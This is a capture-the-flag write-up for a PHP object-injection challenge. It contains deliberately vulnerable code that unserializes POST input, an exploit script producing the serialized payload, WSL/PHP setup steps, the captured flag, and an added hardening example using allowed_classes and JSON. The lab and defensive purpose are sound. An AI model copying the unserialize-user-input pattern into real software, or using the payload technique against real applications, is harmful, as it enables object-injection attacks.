1 Submitting serialized data via a POST parameter
2 Challenge
http://192.168.1.8/fxl1/fxl1.php
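<?php
highlight_file(__FILE__);
class ezUnserialize{
    public $key;
    // Runs automatically when the object is destroyed, including objects created by unserialize()
    public function __destruct()
    {
        if($this->key == "FLAG"){
            include('flag.php');
            echo $flag;
        }
    }
}
// User-controlled POST data is passed straight to unserialize()
unserialize($_POST['a']);
?>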
3 EXP
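<?php
class ezUnserialize{
    public $key;
    // The constructor only sets the property that __destruct() checks in the challenge
    public function __construct($a)
    {
        $this->key = $a;
    }
}
$obj = new ezUnserialize("FLAG");
// Print the serialized object; this string is the value of POST parameter a
echo serialize($obj);
?>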
4 Solution walkthrough
4.0.1 Installing a PHP environment on Ubuntu under WSL
Step 1: Remove Existing PHP Versions
First, let’s clean up any existing PHP 7.x installations:
sudo apt-get purge php7.*
sudo apt-get autoclean
sudo apt-get autoremove
Note about these commands:
autoclean removes obsolete package files from your cache
autoremove removes dependencies that are no longer needed
Using purge removes both packages and their configuration files
Step 2: Add the PHP Repository
Ondřej Surý maintains up-to-date PHP packages for Ubuntu:
sudo add-apt-repository ppa:ondrej/php
sudo apt-get update
Step 3: Install PHP 7.3
Now install PHP 7.3 and common extensions:
sudo apt-get install php7.3
Step 4: Configure Apache (if using Apache)
If you’re using Apache as your web server:
# Disable old PHP module (if any)
sudo a2dismod php7.0 # or whatever version you had before
# Enable PHP 7.3
sudo a2enmod php7.3
sudo systemctl restart apache2
4.0.2 Giving a regular account read, write and execute permissions on /var/www/html
(base) gpu3090@DESKTOP-8IU6393:~$ chown gpu3090 /var/www/html
chown: changing ownership of '/var/www/html': Operation not permitted
(base) gpu3090@DESKTOP-8IU6393:~$ sudo chown gpu3090 /var/www/html
(base) gpu3090@DESKTOP-8IU6393:~$ ls
M5-应用集成 anaconda3 cookies.txt downloads snap summaries tmpg00x95ve.mp3
(base) gpu3090@DESKTOP-8IU6393:~$
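4.0.3 Placing the challenge code and the flag in the corresponding location under /var/www/html/
4.1 Running the EXP PHP script above in VS Code
This requires installing the PHP Debug and PHP Server extensions.
4.2 Running the EXP PHP script in VS Code
4.3 Submitting via HackBar's POST feature
4.4 Getting the flag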
flag{EzUns3ri4liZe_1s_g00d}
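The defensive counterpart to the challenge in section 2, as an added example that is not part of the original write-up: the same class deserialized with and without the allowed_classes option of unserialize(), followed by a JSON-based input handler. The $fired counter, probe() and parse_input() are hypothetical names introduced here, and the payload is the string the EXP script prints.

```php
<?php
// Added example, not the challenge's own code.
class ezUnserialize {
    public $key;
    public static $fired = 0;            // hypothetical counter standing in for include('flag.php')
    public function __destruct() {
        if ($this->key == "FLAG") {      // same check as the challenge
            self::$fired++;
        }
    }
}

// Constructed sample input: the string the EXP script prints.
$payload = 'O:13:"ezUnserialize":1:{s:3:"key";s:4:"FLAG";}';

// Returns [type of the decoded value, number of times the class destructor ran].
function probe(string $payload, array $options): array {
    ezUnserialize::$fired = 0;
    $value = unserialize($payload, $options);
    $type = is_object($value) ? get_class($value) : gettype($value);
    unset($value);                       // drop the last reference so any destructor runs now
    return [$type, ezUnserialize::$fired];
}

// Hypothetical replacement for the endpoint's input handling:
// JSON carries only data, so the client cannot choose which class is instantiated.
function parse_input(string $raw): ?string {
    $data = json_decode($raw, true);
    if (is_array($data) && isset($data['key']) && is_string($data['key'])) {
        return $data['key'];
    }
    return null;
}

// 1) Challenge behaviour: the class is instantiated and its destructor fires.
[$type, $hits] = probe($payload, []);
printf("default options:          type=%s destructor_hits=%d\n", $type, $hits);

// 2) Hardened call: objects decode to __PHP_Incomplete_Class, which has no destructor.
[$type, $hits] = probe($payload, ['allowed_classes' => false]);
printf("allowed_classes => false: type=%s destructor_hits=%d\n", $type, $hits);

// 3) Data-only format: valid JSON is accepted, the serialized object string is rejected.
var_dump(parse_input('{"key":"FLAG"}'));
var_dump(parse_input($payload));
```

allowed_classes also accepts an array of class names when a small, known set of classes must still be deserialized.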